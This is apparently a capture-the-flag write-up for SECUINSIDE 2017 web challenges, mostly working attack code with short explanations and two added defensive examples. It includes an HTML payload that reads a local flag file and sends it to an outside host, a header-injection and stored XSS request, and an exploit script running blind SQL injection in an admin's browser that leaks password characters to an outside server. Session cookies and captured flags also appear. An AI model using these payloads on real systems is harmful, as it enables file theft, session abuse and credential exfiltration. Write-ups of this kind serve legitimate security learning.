source code
https://github.com/junorouse/secuinside2017-pwn1
https://github.com/junorouse/secuinside2017-web1
https://github.com/junorouse/secuinside2017-web-2
desc: caches are deleted every 3 minutes.
cache this file, then make the bot load http/../cache/4b975377a178a70030f2a85daf497836.html (the cached copy, opened as a local file)
cache/4b975377a178a70030f2a85daf497836.html
<!DOCTYPE html><body><script src=http://code.jquery.com/jquery-3.2.1.min.js></script><script>$.ajax({url:"file:///flag",success:function(a){(new Image).src="http://junan.io/flag_"+a},async:!1}),console.log("A")</script>
52.78.36.198 - - [28/Jun/2017:21:12:01 -0400] "GET /flag_SECU[flag] HTTP/1.1" 404 152 "-" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
file:// <-> file:// (same origin): PhantomJS treats a page loaded from file:// as same-origin with every other file:// URL, so the $.ajax to file:///flag above succeeds and returns the file body
relative path without the file:// protocol --> file://[relative path]: a target with no scheme is resolved as a local path, so http/../cache/<hash>.html loads the cached HTML from disk instead of over HTTP
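The resolution rule above, as an added example (not code from the writeup): a scheme-less target handed to a headless browser whose working context is a local file ends up on file://, while the check a server should apply before passing user input to the bot rejects anything that is not an absolute http(s) URL. The base location file:///var/www/html/index.html is an assumption; the cache file name is the one from the writeup.

```javascript
// Added example, not part of the original writeup. Node.js, runs offline.
// Assumed: the bot resolves targets relative to a local page under the web root.
const BASE = "file:///var/www/html/index.html"; // assumption, not a path from the challenge

// How the bot sees a target: WHATWG resolution against the file:// base,
// which is the same rule that turns "http/../cache/x.html" into a local file.
function resolveTarget(input) {
  const u = new URL(input, BASE);
  return { href: u.href, protocol: u.protocol, local: u.protocol === "file:" };
}

// Hardened check: parse WITHOUT a base so relative input fails outright,
// then allow only http/https. Everything the bot opens must pass this.
function isAllowedTarget(input) {
  let u;
  try {
    u = new URL(input); // relative strings throw here -> rejected
  } catch (e) {
    return false;
  }
  return u.protocol === "http:" || u.protocol === "https:";
}

// Constructed sample inputs: the writeup's traversal path, a normal URL,
// a direct file URL and a protocol-relative string.
const SAMPLES = [
  "http/../cache/4b975377a178a70030f2a85daf497836.html",
  "http://junan.io/exploit/exp.js",
  "file:///flag",
  "//attacker.example/x",
];

function report() {
  return SAMPLES.map((s) => ({
    input: s,
    resolvedTo: resolveTarget(s).href,
    local: resolveTarget(s).local,
    allowed: isAllowedTarget(s),
  }));
}

console.table(report());
```

The first sample resolves to file:///var/www/html/cache/4b975377a178a70030f2a85daf497836.html, which is exactly the local load the challenge relied on; the hardened check rejects it, the file:// URL and the protocol-relative string, and keeps the plain http URL.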
flag : SECU[In sl33p h3 s4ng t0 m3, in dr34m5 h3 c4m3]
flag: SECU[phantom_js_is_magicalllllll~!@~!]
from requests import post

# session cookies of the attacker's own account on the target
headers = {
    'Cookie': 'token=a6de6ffba2040055e3ba861aae1f9953012c48cc; user_id=junoim;'
}
data = {
    # the title evidently ends up in a response header unescaped, so the
    # embedded newline injects a second header: Access-Control-Allow-Origin: *
    'title': 'last\nAccess-Control-Allow-Origin: *\n',
    # ticket body rendered for the admin: loads jQuery and the exploit script
    'content': '''
<script src="//code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="http://junan.io/exploit/exp.js"></script>
''',
}
c = post("http://pine-apple.kr/support.php", headers=headers, data=data)
print(c.content)
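Why the newline in the title matters, as an added example that is not the challenge's code: it assumes the server copies the ticket title verbatim into a response header (the header name X-Title is invented for the example), builds the response head both unsanitized and with CR/LF stripped, and parses it back the lenient way a browser does. The title payload is the one from the request above.

```javascript
// Added example, not part of the original writeup. Node.js, runs offline.
// Assumption: the vulnerable server writes the title into a header named
// X-Title without escaping; that name is hypothetical.
const TITLE_PAYLOAD = "last\nAccess-Control-Allow-Origin: *\n"; // from the writeup's request

// Build the response head. With sanitize=true, CR/LF in the value are
// collapsed to a space, which is the minimal fix for header injection.
function buildResponseHead(title, sanitize) {
  const value = sanitize ? title.replace(/[\r\n]+/g, " ") : title;
  return [
    "HTTP/1.1 200 OK",
    "Content-Type: text/html",
    "X-Title: " + value,
    "",
  ].join("\r\n");
}

// Lenient header parser: accepts bare LF as a line break, like browsers do,
// which is exactly why a "\n" inside a value becomes a new header.
function parseHead(head) {
  const headers = {};
  const lines = head.split(/\r?\n/);
  for (const line of lines.slice(1)) { // skip the status line
    if (line === "") break;            // blank line ends the headers
    const idx = line.indexOf(":");
    if (idx < 0) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return headers;
}

function demo() {
  return {
    injected: parseHead(buildResponseHead(TITLE_PAYLOAD, false)),
    sanitized: parseHead(buildResponseHead(TITLE_PAYLOAD, true)),
  };
}

console.log(demo());
```

In the unsanitized case the parsed headers contain access-control-allow-origin: * as a header of its own, so a cross-origin page may read the response; after sanitizing, the whole payload stays inside the x-title value and no CORS header exists.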
//http://52.78.46.132/read.php?idx_token=d83ef283f340426486f9befde2381d1c83fa40dd
// exp.js: runs in the admin's browser via the XSS above, so the request to
// localhost carries the admin's session. Boolean-based blind SQLi on idx_token:
// the request only succeeds when the injected condition on one character of
// admin's user_pw is true.
function go(i, j) {
  var token = "9974370887355d2388f8044de58eac6db0ce50b2";
  $.ajax({
    type: 'get',
    // decoded: idx_token='<token>' && (ascii(substr(user_pw, j, 1))) = i#
    url: "http://localhost/admin/read.php?idx_token=" + token + "%27%20%26%26%20(ascii(substr((select user_pw from users where user_id='admin'))," + j + ",1)))=" + i + "%23",
    //url: 'http://localhost/admin/read.php?idx_token'
    async: false,
    success: function(data) {
      // condition true: leak the matching character to the attacker's host
      var x = new Image();
      x.src = 'http://junan.io/x_' + String.fromCharCode(i);
      console.log(data);
    },
    error: function(err) {
      // condition false: nothing to report
      // var x = new Image();
      // x.src='http://junan.io/x_error';
    }
  });
}
var j = 2; // bsqli index: which character of the password to test (changed per run)
for (var i = 32; i < 127; i++) {
  go(i, j);
}
origin: localhost != 127.0.0.1 (different host names are different origins even on the same server, so the injected script has to target http://localhost/admin/read.php, the host the admin page is served on)
flag : SECU[D0_U_L1K3_X55_C4LLS?]
caches are deleted every minute.
reversing flag : SECU[I have gold medal in AcM ICPC]
pwnable flag : SECU[You pwned my k-vm system bb]